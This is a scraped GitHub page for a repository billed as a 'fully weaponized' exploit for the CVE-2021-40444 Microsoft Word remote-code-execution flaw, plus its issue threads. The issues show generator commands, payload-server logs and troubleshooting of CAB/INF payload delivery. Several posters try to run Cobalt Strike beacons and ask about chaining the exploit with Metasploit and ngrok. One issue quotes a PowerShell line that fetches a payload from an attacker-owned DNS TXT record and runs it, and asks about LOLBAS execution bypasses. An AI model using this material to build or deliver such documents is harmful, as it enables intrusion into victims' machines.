
klezvirus / cve-2021-40444


CVE-2021-40444 - Fully Weaponized Microsoft Office Word RCE Exploit

Python 21.18% HTML 78.36% Batchfile 0.13% JavaScript 0.20% VBScript 0.12% PowerShell 0.02%
cve-2021-40444 msword office 0day rce remote-code-execution

cve-2021-40444's Introduction


Senior Security Noob
Tooling around in my own free time, whenever my beloved kid is not playing with the keyboard. xD


cve-2021-40444's People

Contributors

klezvirus


cve-2021-40444's Issues

Upcoming change to in_place will break generator.py

Hi, I'm the author of in_place, which this project uses in generator.py, and I'm letting you know that the upcoming v1.0 of in_place will bring API changes that will break your code; see this issue for more information.

Until v1.0 is released and your code is updated, I would suggest restricting the in_place version in your requirements.txt like so:

in_place < 1.0

Unable to reproduce exploit with latest revision

I first tested with the repo I downloaded 2 days ago. All works.
Then I tested with the latest download.

  1. Standard exploit: calc does not open, files are not written to Temp
  2. test\job-jscript.wsf --no-cab exploit: I get a popup saying you need a new app to open this file
    I then opened the test.wsf file manually and selected to open it using wscript; it worked, calc opened.
    Then I opened the docx file and it worked.

So it seems that the user would have had to run a .wsf file manually beforehand.

Video:
https://streamable.com/367ydh

Intermittent %TEMP% drop

I'm experiencing an issue where Word intermittently drops msword.inf in %TEMP%. I click the Word document, it works. Close Word. Clean %TEMP% out. Then click the Word document again, and it does not work. I see consistent GET requests for the cab file each time the Word document is opened. Any help would be greatly appreciated to get Word to drop consistently.

calc.dll executes but cobalt strike payload does not

So this is strange: I tested it with calc.dll, and it works.
On the same VM, same server, same settings, I used Cobalt Strike's beacon (tried 32- and 64-bit DLL), but it does not work.
The inf file downloads to the correct location (temp)
but does not execute correctly.
If I manually run the inf file that was downloaded by typing C:\Users\User\AppData\Local\Temp>rundll32.exe XQ3H4QH3S1XH.inf, start
the payload executes.

Question

How to combine with metasploit for exploiting different networks, and with ngrok?

/bin/sh: 1: makecab: not found

┌──(kali㉿kali)-[~/CVE-2021-40444]
└─$ python3 generator.py -u http://127.0.0.1 -P test/calc.dll --host 1 ⨯
[*] Generating a malicious payload...
[*] Multiple compatible templates identified, choose one:
0: cab-orig-debobfuscated2.html
1: cab-orig-debobfuscated1.html
2: cab-orig-j00sean.html
3: cab-orig-obfuscated.html
$> 3
[>] Payload: test/calc.dll
[>] HTML/CAB/JS Hosting Server: http://127.0.0.1
[*] Crafting Relationships to point to HTML/CAB/JS Hosting Server...
[*] Packing MS Word .docx file...
[*] Generating CAB file...
/bin/sh: 1: makecab: not found
Command 'makecab /F "/home/kali/CVE-2021-40444/data/mswordcab.ddf"' returned non-zero exit status 127.

Not downloading the cab file when Word document is opened

I have spent many hours trying to get it to work.
I checked the URLs. If I paste the URL mhtml:https://mydomain.com/test/BF2W7C4FOLB0.html!x-usc:https:/mydomain.com/test/BF2W7C4FOLB0.html into IE, then I get the INF file downloaded to the Temp folder.
So the URL is working.

But when the generated document is opened, I do see the "Contacting the server for information" message,
but the INF file is not downloaded.

What or where could I start troubleshooting?

code 501, message Unsupported method ('OPTIONS')

I have tried on localhost, port 80
code:
generator.py -P new.dll -p 80 -u http://localhost -o BF2W7C4FOLB0 --host

Output when docx is opened:


Serving HTTP on :: port 80 (http://[::]:80/) ...
::1 - - [19/Sep/2021 03:36:13] code 501, message Unsupported method ('OPTIONS')
::1 - - [19/Sep/2021 03:36:13] "OPTIONS / HTTP/1.1" 501 -
::1 - - [19/Sep/2021 03:36:15] "HEAD /BF2W7C4FOLB0.html HTTP/1.1" 200 -
::1 - - [19/Sep/2021 03:36:15] code 501, message Unsupported method ('OPTIONS')
::1 - - [19/Sep/2021 03:36:15] "OPTIONS / HTTP/1.1" 501 -
::1 - - [19/Sep/2021 03:36:16] "GET /BF2W7C4FOLB0.html HTTP/1.1" 200 -
::1 - - [19/Sep/2021 03:36:16] "HEAD /BF2W7C4FOLB0.html HTTP/1.1" 200 -
::1 - - [19/Sep/2021 03:36:16] "HEAD /BF2W7C4FOLB0.html HTTP/1.1" 200 -
::1 - - [19/Sep/2021 03:36:16] code 501, message Unsupported method ('OPTIONS')
::1 - - [19/Sep/2021 03:36:16] "OPTIONS / HTTP/1.1" 501 -
::1 - - [19/Sep/2021 03:36:18] "HEAD /BF2W7C4FOLB0.html HTTP/1.1" 200 -
::1 - - [19/Sep/2021 03:36:18] code 501, message Unsupported method ('OPTIONS')
::1 - - [19/Sep/2021 03:36:18] "OPTIONS / HTTP/1.1" 501 -
::1 - - [19/Sep/2021 03:36:18] "GET /BF2W7C4FOLB0.html HTTP/1.1" 304 -
::1 - - [19/Sep/2021 03:36:18] "HEAD /BF2W7C4FOLB0.html HTTP/1.1" 200 -
::1 - - [19/Sep/2021 03:36:18] "HEAD /BF2W7C4FOLB0.html HTTP/1.1" 200 -
::1 - - [19/Sep/2021 03:36:18] "GET /BF2W7C4FOLB0.cab HTTP/1.1" 200 -
::1 - - [19/Sep/2021 03:36:19] "HEAD /BF2W7C4FOLB0.html HTTP/1.1" 200 -

The cab with dll doesn't work

Hi,

I used
python generator.py -u http://127.0.0.1 -P test\calc.dll --host

to generate the exploit. When opening the docx to test locally, here is what shows up on the payload server:

127.0.0.1 - - [14/Jul/2022 23:09:20] "OPTIONS / HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "GET /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "OPTIONS / HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "GET /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "GET /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:21] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -

What could be wrong? or am I missing something?

Payload delivery server exits / not hosting files

Firstly, thank you for the amazing work! I am fascinated.

I tried this on two machines, one a windows 7 and one windows 10 latest. Both seem to have the same issue. The web server is not hosted. It seems that the window just flashes for a second and exits. Please see video below

cvenew.mp4

mswordcab.ddf returned non-zero exit status 1.

What is the cause of this error?

C:\Users\Adam\Desktop\WORD exploit>python generator.py -u http://127.0.0.1 -P test\calc.dll --host
[*] Generating a malicious payload...
[*] Multiple compatible templates identified, choose one:
  0: cab-orig-debobfuscated1.html
  1: cab-orig-debobfuscated2.html
  2: cab-orig-j00sean.html
  3: cab-orig-obfuscated.html
  $> 1
  [>] Payload: test\calc.dll
  [>] HTML/CAB/JS Hosting Server: http://127.0.0.1
[*] Crafting Relationships to point to HTML/CAB/JS Hosting Server...
[*] Packing MS Word .docx file...
[*] Generating CAB file...
Command 'makecab /F "C:\Users\ADAM\Desktop\WORD exploit\data\mswordcab.ddf"' returned non-zero exit status 1.

code 404, message File not found

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.175.139 - - [08/Oct/2021 23:11:32] code 501, message Unsupported method ('OPTIONS')
192.168.175.139 - - [08/Oct/2021 23:11:32] "OPTIONS / HTTP/1.1" 501 -
192.168.175.139 - - [08/Oct/2021 23:11:32] code 404, message File not found
192.168.175.139 - - [08/Oct/2021 23:11:32] "HEAD /word.html HTTP/1.1" 404 -
192.168.175.139 - - [08/Oct/2021 23:11:35] code 501, message Unsupported method ('OPTIONS')
192.168.175.139 - - [08/Oct/2021 23:11:35] "OPTIONS / HTTP/1.1" 501 -
192.168.175.139 - - [08/Oct/2021 23:11:35] code 404, message File not found
192.168.175.139 - - [08/Oct/2021 23:11:35] "GET /word.html HTTP/1.1" 404 -

missing dependency

add a requirements.txt at your project root.

requirements.txt:

in-place

Unable to load other program generated DLLs

Sorry, I can pop up the calc program normally in the local test, but when I use Cobalt Strike to generate a malicious DLL for testing, I found that the inf can be downloaded to the %temp% directory normally, but I don't know what happened during the loading process, resulting in the failure to execute the DLL normally. In general, my idea of loading the Cobalt Strike DLL has failed. I really want to know why, if you are interested in testing it. My version of Windows is Professional, version 10.0.10240. Thank you.

Follina

Hello @klezVirus, thanks for your work, and your tools!

How to build a Follina doc without hosting, just with a command/payload file (ps1, raw, txt...)?

#maybe it can be useful https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed
Here is a function to use a real doc.

dinvoke, direct syscalls or a method to get the payload from DNS records
#"powershell . (nslookup -q=txt some.owned.domain.com)[-1]"
#(nslookup -q=txt # some.owned.domain.com)[-1]"?
https://github.com/rtfmkiesel/goldig (cool)

#https://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina
RTF no click (folder visit)

And the main question is:
using another service, not msdt
https://lolbas-project.github.io/#
List of those which can execute and bypass some.
